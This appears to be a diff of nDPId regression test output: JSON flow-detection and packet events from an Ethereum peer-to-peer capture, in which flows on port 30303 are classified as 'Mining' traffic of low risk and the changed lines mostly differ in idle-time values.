+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364659,"flow_last_seen":1578508364819,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364819,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1578508364823,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364823,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACYGE48SimxDwKgBuHZf3S4uwDPtE20MrKAS\/ogQ2gAAAgQFrAQCCAqmusMwItiUTwEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1578508364823,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364823,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+ZbAqAG4EopsQ90udl8TbQysLsAz7oAQECws4QAAAQEICiLYlWmmusMw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364824,"flow_last_seen":1578508364824,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364824,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1578508364824,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364824,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGhG3AqAG4n8tUH906dl\/csM+rAAAAALAC\/\/\/IeAAAAgQFtAEDAwUBAQgKItiVagAAAAAEAgAA"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508364825,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1578508364831,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364831,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAOcGbbUSilEcwKgBuHZf3S\/8FjKFFTVZHKASaN8k0QAAAgQFrAQCCApjgYkbItiUTwEDAwc="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1578508364831,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364831,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFL7AqAG4EopRHN0vdl8VNVkc\/BYyhoAQECyrKAAAAQEICiLYlW9jgYkb"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364832,"flow_last_seen":1578508364832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364832,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1578508364832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364832,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGt9PAqAG4ouQdoN07dl+4t7BdAAAAALAC\/\/8\/HwAAAgQFtAEDAwUBAQgKItiVcAAAAAAEAgAA"} 
+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":471,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508364833,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1578508364841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364841,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADcGsuQiYawWwKgBuHZf3SnE3x7vnZqFEqAS\/ojiZQAAAgQFrAQCCAoxzJM4ItiUTwEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1578508364841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364841,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqezAqAG4ImGsFt0pdl+dmoUSxN8e8IAQECz+XAAAAQEICiLYlXkxzJM4"} 
+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364842,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364842,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1578508364862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364862,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGeCSlFmshwKgBuHZf3SJnRYz4cyqhtKAScSBl3gAAAgQFrAQCCAo1gVUZItiUTwEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1578508364862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364862,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGaCzAqAG4pRZrId0idl9zKqG0Z0WM+YAQECz0WAAAAQEICiLYlY01gVUZ"} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508364863,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1578508364877,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364877,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACEGk4U0u88bwKgBuHZf3S3Pd7n11PppgaAS\/oiD+wAAAgQFoAQCCApvJb2EItiUTwEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1578508364877,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364877,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGdI3AqAG4NLvPG90tdl\/U+mmBz3e59oAQEAmf6AAAAQEICiLYlZpvJb2E"} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":525,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1578508364879,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364922,"flow_last_seen":1578508364922,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364922,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1578508364922,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364922,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+OGAAAAgQFtAEDAwUBAQgKItiVxAAAAAAEAgAA"} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364924,"flow_last_seen":1578508364924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364924,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1578508364924,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364924,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtY\/AqAG40frwzd0+dl+QvttrAAAAALAC\/\/85bQAAAgQFtAEDAwUBAQgKItiVxgAAAAAEAgAA"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364925,"flow_last_seen":1578508364925,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364925,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1578508364925,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364925,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHG4wAAEARgdzAqAG4I7T2qXZfdl0As6VnAUq3Z7jOf6Ug2frhkOredmKGawH96dNwPwCsVwwwAuHNRLachJG6Hj8pd5+\/iUKj3xzFalkHy\/4zo7e13\/nakEgcyoOcntMlISOmld4GtANNEoWSHW0IYrUbIiG7qvHSAQP4R7hAGwckxV38aoEQ3R3z6i1sbxgztMaJbhd8mlK6anhGQ6H0+w6JOUS\/FIH4b+eX+gcKRXXgkrfcf69BwK1A+Siq+4ReFiBg"} 00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364925,"flow_last_seen":1578508364925,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364925,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1578508364932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364932,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGkHGfy1QfwKgBuHZf3TprW2X93LDPrKAScSCdQwAAAgQFrAQCCApPeKo9ItiVagEDAwc="} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1578508364932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGhHnAqAG4n8tUH906dl\/csM+sa1tl\/oAQECwsmQAAAQEICiLYlc1PeKo9"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364932,"flow_last_seen":1578508364932,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364932,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1578508364932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGvd3AqAG4Etunn90\/dl9+5\/UeAAAAALAC\/\/851wAAAgQFtAEDAwUBAQgKItiVzQAAAAAEAgAA"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364824,"flow_last_seen":1578508364933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1578508364933,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1578508364932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364932,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGkHGfy1QfwKgBuHZf3TprW2X93LDPrKAScSCdQwAAAgQFrAQCCApPeKo9ItiVagEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1578508364932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGhHnAqAG4n8tUH906dl\/csM+sa1tl\/oAQECwsmQAAAQEICiLYlc1PeKo9"} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364932,"flow_last_seen":1578508364932,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364932,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1578508364932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGvd3AqAG4Etunn90\/dl9+5\/UeAAAAALAC\/\/851wAAAgQFtAEDAwUBAQgKItiVzQAAAAAEAgAA"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364824,"flow_last_seen":1578508364933,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1578508364933,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
01877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1578508364954,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"thread_ts_msec":1578508364954,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ91J1AACwRmVQjtPapwKgBuHZddl8EKaTIL6PiPVD76wxxux15bHRlnSs2av4nBFSV7v4bhHiIpeAMxLmbK8f6wiaJfQicCaKdl2RU3riNA4G85e32CrySn3+r4nugeiGUNmLmJTGwe70KAk\/1yl9pMbVr5iHiC9EbAQT5A7z5A7T4TYSnVnoygnZfgnZfuECQJNyxBglNPC+n9m4t\/W08TtywpdWYdWjkRxmhkajaDCz+gK\/mbTitDTyIYj\/DM6dFql13rAhhOsl+TepFcV7R+E2EVmvzPoJ2X4J2X7hAs1lDgaitKFA3cxLdFsLwt7VebQyms4a6o\/fivZtKo8AkJ6dL4w4Dn4+\/vC\/\/JsKeSIScYYBOpqnxxVMZ+XWFxvhNhIui\/9KCdl+Cdl+4QKesUvPGk3pcExPSpjjyYak+S\/zgRaKyCtkCAnADlTupsK\/kU6vbTyjVeYLvjRqhlLfuaobh1XsP1yYWbMEwCkP4TYROL5ObgnZfgnZfuEBjjxCUsfvwMHRxTE5YrP7+ISCuREmPbKrzjoabqIoNEUz\/YRnAV2w6k47DZjKIksCMD5bt88unhn0EsLYp\/SzX+E2EXkQ3ooJ2X4J2X7hAPuP3gMJbiMdT+jVwpl443XaSBNUfQ0qZUmbru+9L8er4h7zKFM+7c1K4WVxLv0mgiZa++5g5WXQyn8nQTgubb\/hNhIpLq76Cdl+Cdl+4QPw+TE9tCaxzvKUZLrSUydGaIDt2Km6jvC1h7Hg9CIqQESMae7r6mkOxEncigdCNSYhdj\/fphc\/puhfvJzVEsBH4TYQj6yXYgnZfgnZfuEC5nQSZ\/xzD17vSEoHg\/jtmGLuRaM3q97\/3Czva8FggRyrw44MHO8OtruMk8OoTJc88hHmdKvMBoeGC+K0eEhFi+E2Ep1ZKIYJ2XYJ2XbhAYZoPsgtYlBM737vFkYUTo\/9EphiWRNvy3F9PFQKE60Wg2vh7fDKeVFJ2s+C3+rlsvule\/8FMZch7lhCdhu+rUPhNhJ3mmFeCdl+Cdl+4QGQs+WUN2IadQlJdv2hYAS47TWT0deczhHq293QjQaQ5dBSGXZU4dOj17ZGw5OHFM97hStHWuydqVFmyRxRg\/w34TYQ050sDgsVJgsVJuEDzSXu93jNII3idYaebqM1QwrATGCoZMfOLWHKo8\/HNEvGmOW1TsZdycKJciiZgh6ud1sRz67L9tP+HeODfKFTV+E2EDfsOx4J2X4J2X7hAH7mV1eGOz5WoeIocWFwRYF7ZVBDRcdtaFFH5u23BFJ62FH1ch71cEmxc8OtYpiPqb2N3y6mQjsQPeWAgtQws9vhNhCPknjSCdl+Cdl+4QFeAPtyTjNbAmZsxJ+YSStMfUptpi+Ck9CtWlo\/Fnkmot5zzhg4wYebjEaqIDMNNKgYreTwT+o6X4euclIzcKBSEXhYgYA=="} 
01017{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1578508364954,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364954,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHF1J5AACwRm8sjtPapwKgBuHZddl8BsQR1SNeP1ZrG\/ZwtEcGW5vGA0sDGp78prdWhxHtDqEDU7PNKL6kZEdICkE\/ClTr5riDvJ\/S0Juy5pZvsiDZ34LyanRNXXRjpzjohXnlvDARKWl\/FPyuFUx\/5q7iG79kKNiaGAAT5AUT5ATz4TYS5GczRgm\/xgm\/xuEBa13f1PeAY+pXn+QDG2H2vRnbUjALc47yKM1DGaLaCBXAmqDZbTzNfSqGBTAVPFFnsJtnCFC0Fv0w0bIIRmdWp+E2EijsROoJ2X4J2X7hAJi3PrTUi8k0+hp72TGveiEIya6qIgjO27CDPgcM2XClPC4ML\/96HDCNIKvA6L6b3KKoTFoGm44u2hTJ2hJ9PJvhNhM+0ztiCdl+Cdl+4QCCTHaJCBMKOiAeM0+J0ILaNmDQGKBpq95aDifzAyS6BBPIijEGzkyTvF6L1V27y7PdVSWOVkbAaliLEx1mlVCv4TYRf2EBxgnX+gnX+uEAuHZY2QcmV8WQCz4M\/VG5LfG7tHam\/sFovnjhq\/yEXmxTFgIMHUbncizgn1Jn7XeiL7CoOoCVHxB7uvvn28VO3hF4WIGA="} 